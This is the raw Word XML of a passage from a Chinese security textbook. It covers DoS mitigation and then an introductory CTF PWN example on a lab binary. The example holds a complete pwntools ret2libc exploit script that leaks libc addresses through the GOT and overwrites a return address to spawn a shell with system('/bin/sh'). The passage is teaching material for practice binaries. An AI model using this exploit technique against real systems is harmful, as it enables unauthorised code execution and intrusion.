    <w:p w14:paraId="73CFB20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要防范由占用网络带宽资源引起的DoS攻击。在发送错误响应前，应该检查网络请求的有效性，若传输的服务器数据包不是应用系统该处理的，则将其丢弃，应用系统仅对通过系统协议认证的请求作出响应。除了应用层鉴别方法，还可以通过网络层进行初步识别，排除发送到或来自广播网地址或使用保留端口的数据源，以有效阻断这类攻击。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01ECCFB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还有一类DoS攻击会消耗某种特定资源，如果应用程序判断处于这类攻击的威胁中，应改变应用程序的行为方式。以微软SYN泛洪保护为例，如果有较多的资源可用，系统能正常工作，如果资源过低，系统将结束一些非活动用户的会话。这种方法要求系统运行时维护一张正常会话客户端列表，也可以将资源配额和超时链接相结合，缓解这类威胁发生的可能。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74EA7DC4"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2.7</w:t>
      </w:r>
      <w:r w:rsidRPr="000012A0">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="000012A0">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">7 </w:t>
      </w:r>
      <w:r w:rsidRPr="000012A0">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>PWN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62E7CEE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什么是PWN？</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>CTF比赛主要表现以下几个技能上：逆向工程、密码 学、ACM编程、Web漏洞、二进制溢出、网络和取证等。在国际CTF赛事中，二进制溢出也称之为PWN。PWN是一个黑客语法的俚语词，自"own"这个字引申出来的，这个词的含意在于，玩家在整个游戏对战中处在胜利的优势，或是说明竞争对手处在完全惨败的 情形下，这个词习惯上在网络游戏文化主要用于嘲笑竞争对手在整个游戏对战中已经完全被击败（例如："You just got pwned!"）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71FA3B4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CTF中PWN题型通常会直接给定一个已经编译好的二进制程序（Windows下的EXE或者Linux下的ELF文件等），然后参赛选手通过对二进制程序进行逆向分析和调试来找到利用漏洞，并编写利用代码，通过远程代码执行来达到</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>溢</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>出攻击的效果，最终拿到目标机器的shell夺取flag</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>。接下来介绍一个入门级的示例。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27C1033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实验环境：Kali</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>-2021.1</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>虚拟机，以及checksec、pwn等一系列的pwn常用攻击，目标程序是ret</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>libc</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，接下来描述解题过程。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32A40D99"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用checksec观察该程序的保护机制，发现只开了堆栈不可执行的保护。也就是说虽然不能将payload放到堆栈中，但是可以覆盖返回地址，通过Ret</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>libc的方式实现攻击。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AAA7328"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60404434" wp14:editId="1C85585C">
            <wp:extent cx="1841500" cy="490371"/>
            <wp:effectExtent l="0" t="0" r="6350" b="508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37">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2073665" cy="552194"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5810B7CC" w14:textId="5428953F"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.3</w:t>
      </w:r>
      <w:r w:rsidR="00715DC2">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>checksec运行结果</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1467E70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用IDA的反汇编功能发现这个程序很简单，用了puts函数和printf函数来打印字符串，然后用了gets函数让用户输入一个字符串，用户输入大于等于1</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>00</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>字节时会超出局部变量s的缓冲区。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7116A9D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然后又看到程序中没有system函数和/bin</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>sh字符串，但是它用了libc里的函数，意味着运行时会加载libc，里面有system函数和/bin</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>sh字符串，则可以通过plt代码片段和got</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>plt表来泄露system函数和/bin</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>sh字符串的地址，从而使程序运行system</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(“/bin/sh”)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D7DB290"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noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="429B7041" wp14:editId="602E353E">
            <wp:extent cx="4039068" cy="2542288"/>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38">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4060696" cy="2555901"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A37E6B3" w14:textId="798E0889"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.3</w:t>
      </w:r>
      <w:r w:rsidR="00715DC2">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>IDA的反汇编结果</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D9A3732"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noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="67BD7E3D" wp14:editId="6BA0C785">
            <wp:extent cx="2718604" cy="2945154"/>
            <wp:effectExtent l="0" t="0" r="5715"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39">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2744089" cy="2972762"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="60444EA8" w14:textId="34E4D47C"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.3</w:t>
      </w:r>
      <w:r w:rsidR="00715DC2">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>可执行程序中用到的函数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="378A668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代码2</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">.21 </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>攻击代码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="538C780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4EE476DC"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from pwn import *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DB0AE1D"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from LibcSearcher import LibcSearcher</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E14605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1EC16A6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 = process('./ret2libc3')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D1B1E0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elf = ELF('./ret2libc3')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="145B9FA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1A088AA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puts_got_addr = elf.got['puts']  </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>#got</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>plt表中用于存放puts函数地址的内存的地址</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54BB2ED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puts_plt_addr = elf.plt['puts']  </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>#plt中用于跳转到puts函数的代码（jmp</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> * puts_got_addr</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>）的地址</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C00943F"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main_plt_addr = elf.symbols['main'] </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>#main函数的首地址</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D43F9D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23D3CB5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print ("puts_got_addr = ",hex(puts_got_addr))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F2C076C"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print ("puts_plt_addr = ",hex(puts_plt_addr))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27256CA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print ("main_plt_addr = ",hex(main_plt_addr))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61C67299"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1527444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payload = flat(['A' * 112, puts_plt_addr, main_plt_addr, puts_got_addr])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E742D5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#将原本的返回地址覆盖为puts函数的地址，puts函数运行完后将会返回到main，使得用户可以继续利用漏洞，puts函数的参数时puts函数的首地址</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69FB531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p.recv()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69B085CE"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p.sendline(payload)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="340A1CDC"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0301E26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puts_addr = u32(p.recv()[0:4])  </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>#获得puts函数的首地址</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A57C2B6"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print ("puts_addr = ",hex(puts_addr))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13D5C7E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libc = LibcSearcher('puts', puts_addr)  </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>#获取libc对应版本的相关信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B62457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libcbase = puts_addr - libc.dump('puts')  </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>#通过puts偏移量计算libc的基地址</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5410366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system_addr = libcbase + libc.dump('system') </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>#通过system偏移量计算system函数地址</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D03180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binsh_addr = libcbase + libc.dump('str_bin_sh') </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>#通过/bin</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>sh偏移量计算/bin</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>sh地址</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ABCC65D"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4712BC1F"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print ("libc_base_addr = ",hex(libcbase ))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34C7BF0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print ("sys_addr = ",hex(system_addr))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DF8AAF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print ("sh_addr = ",hex(binsh_addr))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77C29DE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0030127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4F41229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 xml:space="preserve">payload = flat(['A' * 104, p32(system_addr), 'AAAA', p32(binsh_addr)])  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10D8E00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#重新覆盖main函数返回地址为system函数地址，参数为/bin</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B169D31"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p.sendline(payload)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D99534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p.interactive()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E1D2CB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运行攻击脚本，获得了shell。最后一次漏洞利用填充字符串长度为1</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>04</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>而不是1</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>12</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的原因：当用gdb调试目标程序，在第一次运行main函数的 and</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>esp,</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>0xfffffff0</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>时，esp的最低位是8，也就是esp在这里为了对齐而减了8个字节，而在第二次运行main时，esp已经对齐，这个指令不会让esp有变化，所以第二次少填充了8个字节。另外，攻击时libc版本要选对，因为不同版本的libc中的函数偏移量不同。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2048C1A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通过plt和got.plt的方式泄露system函数的地址和字符串/bin</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>sh的地址是动态的，所以即便系统开启了ALSR防护，也会泄露正确的函数地址和字符串地址，无法防御该攻击。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="223A9384"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12131F99" wp14:editId="02AFE1D0">
            <wp:extent cx="4403500" cy="3116275"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>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38699" cy="3141185"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C39F2FD" w14:textId="40F4847A"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.3</w:t>
      </w:r>
      <w:r w:rsidR="00715DC2">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
